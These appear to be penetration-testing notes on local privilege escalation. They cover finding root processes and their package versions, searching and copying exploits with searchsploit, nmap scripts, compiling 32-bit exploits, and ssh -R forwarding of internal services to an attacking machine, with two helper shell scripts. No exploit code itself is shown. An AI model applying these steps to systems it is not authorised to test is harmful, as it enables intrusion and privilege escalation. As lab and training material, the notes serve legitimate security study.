Offline Exploit Resources
Initial Checks
Check which processes run as root or another privileged user, then try to identify the version of each such program: a privileged process running a version with a known local exploit is the usual target. The anchored pattern matches lines whose first column (the user) is root.
ps aux | grep '^root'
Try running the program with the --version or -v command-line option to print its version number (some programs only show it in their usage or help output).
<program> --version
<program> -v
On Debian-like distros, dpkg lists installed packages and their versions. Prefer the package version when comparing against an exploit's affected versions: distros backport security fixes without bumping the upstream version string, so the output of --version alone can make a patched program look vulnerable.
dpkg -l | grep <program>
On RPM-based systems, rpm achieves the same
rpm -qa | grep <program>
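The checks above combined into one script, as an added example that is not part of the original notes: it parses ps aux output for the distinct binaries run by a given user and looks each one up with dpkg or rpm so the installed version can be compared against searchsploit results. The ps sample inside it is constructed, the script name privcheck.sh is a placeholder, and the package lookups only produce output on a host that actually has dpkg or rpm.

```sh
#!/bin/sh
# Added example, not from the original notes: parse `ps aux` output for the
# distinct binaries run by a privileged user and look each one up in the
# package database. The sample ps output below is constructed.

# Print the distinct executables run by user $1 (default root). Reads `ps aux`
# output on stdin; COMMAND is the 11th column. Kernel threads ([kthreadd]) are
# skipped because they are not binaries worth looking up; the header line does
# not match the user name, so it drops out as well.
root_binaries() {
    user="${1:-root}"
    awk -v u="$user" '$1 == u && $11 !~ /^\[/ { print $11 }' | LC_ALL=C sort -u
}

# Report "<package> <version>" for the package owning binary $1, using dpkg on
# Debian-like systems and rpm on RPM-based ones. Prints nothing for a binary no
# package owns (hand-installed software), which is itself worth noting.
pkg_version() {
    bin="$1"
    if command -v dpkg >/dev/null 2>&1; then
        # dpkg -S prints "package[:arch]: /path"; keep the package name only.
        pkg=$(dpkg -S "$bin" 2>/dev/null | head -n 1 | cut -d: -f1)
        if [ -n "$pkg" ]; then
            dpkg-query -W -f='${Package} ${Version}\n' "$pkg" 2>/dev/null
        fi
    elif command -v rpm >/dev/null 2>&1; then
        rpm -qf --qf '%{NAME} %{VERSION}-%{RELEASE}\n' "$bin" 2>/dev/null
    fi
    return 0
}

# Constructed sample of `ps aux` output (not captured from a real host) so the
# parsing can be exercised offline.
sample_ps() {
    cat <<'EOF'
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  22000  5000 ?        Ss   10:00   0:01 /sbin/init splash
root         2  0.0  0.0      0     0 ?        S    10:00   0:00 [kthreadd]
www-data   900  0.0  0.2  40000  8000 ?        S    10:01   0:00 /usr/sbin/apache2 -k start
root       901  0.0  0.2  40000  8000 ?        Ss   10:01   0:00 /usr/sbin/apache2 -k start
root       950  0.0  0.1  15000  6000 ?        Ss   10:02   0:00 /usr/sbin/sshd -D
root       951  0.0  0.1  15000  6000 ?        S    10:02   0:00 /usr/sbin/sshd -D
EOF
}

# Usage: sh privcheck.sh             -> parse the constructed sample
#        sh privcheck.sh scan [user] -> parse live `ps aux` and look up versions
case "${1:-sample}" in
    sample) sample_ps | root_binaries ;;
    scan)   ps aux | root_binaries "${2:-root}" | while read -r bin; do
                printf '%s\t%s\n' "$bin" "$(pkg_version "$bin")"
            done ;;
esac
```

Run it with scan on the target to get one line per root-owned binary with its package version; a binary with an empty version column was not installed from a package and needs the --version check by hand.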
SearchSploit
Install exploitdb, or update it if already present, so the local copy of the database has the most recent entries
sudo apt update && sudo apt install exploitdb
Example: search for remote SMB exploits affecting Microsoft Windows (the terms are combined, so all of them must match)
searchsploit remote smb microsoft windows
Copy an exploit into the current directory with -m, using the path shown in the search results
searchsploit -m windows/remote/48537.py
nmap NSE scripts
Example nmap command running every script whose name starts with http (quote the pattern so the shell does not expand it as a file glob)
nmap --script "http*" -sC -sV <IP>
Get help on a specific script
nmap --script-help=clamav-exec.nse
Compilation
Many older Linux exploits are written for 32-bit targets. On a 64-bit build machine install the multilib toolchain (and the 32-bit X11 headers, which some exploits need) and build with -m32. The :i386 package is only installable once the i386 foreign architecture has been enabled in dpkg. Where possible compile on the target itself, or on a box running the same distro release, since a binary linked against a newer glibc may refuse to run on the target.
sudo apt-get install gcc-multilib
sudo apt-get install libx11-dev:i386 libx11-dev
gcc 624.c -m32 -o exploit
Port Forwarding
In some cases a root process is bound only to an internal port (for example a service listening on 127.0.0.1) that cannot be reached from the attacking machine. If the exploit cannot be run locally on the target, forward the port back to the attacking machine and run the exploit against the forwarded port. See more on this at 19.1 - Port Forwarding with Linux Tools and 20.1 - Ligolo Port Forwarding.
Check which local ports the service is listening on; addresses of the form 127.0.0.1:<port> are the ones that need forwarding
netstat -nl
Run from the target, the following opens a remote port forward: <local-port> is bound on the attacking machine (<local-machine>, which the target must be able to ssh to), on its loopback interface unless the attacker's sshd sets GatewayPorts, and every connection to it is relayed to 127.0.0.1:<service-port> on the target. ssh -R carries TCP only.
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
Example: connecting from the attacking machine to the target's MySQL service after it has been forwarded to local port 4444
mysql -u root -h 127.0.0.1 -P 4444
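The port-forwarding steps above as an added example that is not part of the original notes: it parses netstat -nl output for services bound only to loopback, which are the ones that need forwarding, and composes the matching ssh -R command for each TCP listener. The netstat sample, the script name fwdcheck.sh and the attacker account user@10.10.14.1 are all constructed placeholders.

```sh
#!/bin/sh
# Added example, not from the original notes: list services on the target that
# listen only on loopback (unreachable from the attacking machine without a
# forward) and print the matching `ssh -R` command for each TCP listener.
# Assumes `netstat -nl` output in the Linux net-tools layout.

# Read `netstat -nl` output on stdin and print "<proto> <port>" for each TCP/UDP
# listener bound to a loopback address (127.0.0.0/8 or ::1). Wildcard binds
# (0.0.0.0, ::) are skipped because they are reachable directly.
loopback_listeners() {
    awk '
        $1 ~ /^(tcp|udp)6?$/ {
            addr = $4
            n = split(addr, part, ":")
            port = part[n]
            host = substr(addr, 1, length(addr) - length(port) - 1)
            if (host ~ /^127\./ || host == "::1") print $1, port
        }
    ' | LC_ALL=C sort -u
}

# Compose the remote port forward to run on the target. <local-port> gets bound
# on the attacking machine (loopback only unless its sshd sets GatewayPorts) and
# is relayed to 127.0.0.1:<service-port> on the target. -N opens no shell, so
# the session exists only for the forward.
forward_cmd() {
    local_port="$1"; service_port="$2"; attacker="$3"
    printf 'ssh -N -R %s:127.0.0.1:%s %s\n' "$local_port" "$service_port" "$attacker"
}

# Constructed sample of `netstat -nl` output (not captured from a real host).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 ::1:6379                :::*                    LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
udp        0      0 127.0.0.53:53           0.0.0.0:*
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     12345    /run/mysqld/mysqld.sock
EOF
}

# For every loopback listener print what to run on the target. The attacker-side
# port defaults to the service port; user@10.10.14.1 is a placeholder account.
report() {
    loopback_listeners | while read -r proto port; do
        case "$proto" in
            tcp*) printf '%s/%s on loopback -> ' "$proto" "$port"
                  forward_cmd "$port" "$port" user@10.10.14.1 ;;
            *)    printf '%s/%s on loopback -> ssh -R forwards TCP only\n' "$proto" "$port" ;;
        esac
    done
}

# Usage: sh fwdcheck.sh        -> analyse the constructed sample
#        sh fwdcheck.sh live   -> analyse the real `netstat -nl` output
case "${1:-sample}" in
    sample) sample_netstat | report ;;
    live)   netstat -nl | report ;;
esac
```

Run it with live on the target to get one ssh -R line per loopback-only TCP service. Those commands are executed on the target; on the attacking side the forwarded port then appears on 127.0.0.1, which is why the mysql example above connects to 127.0.0.1 rather than to the attacker's external address.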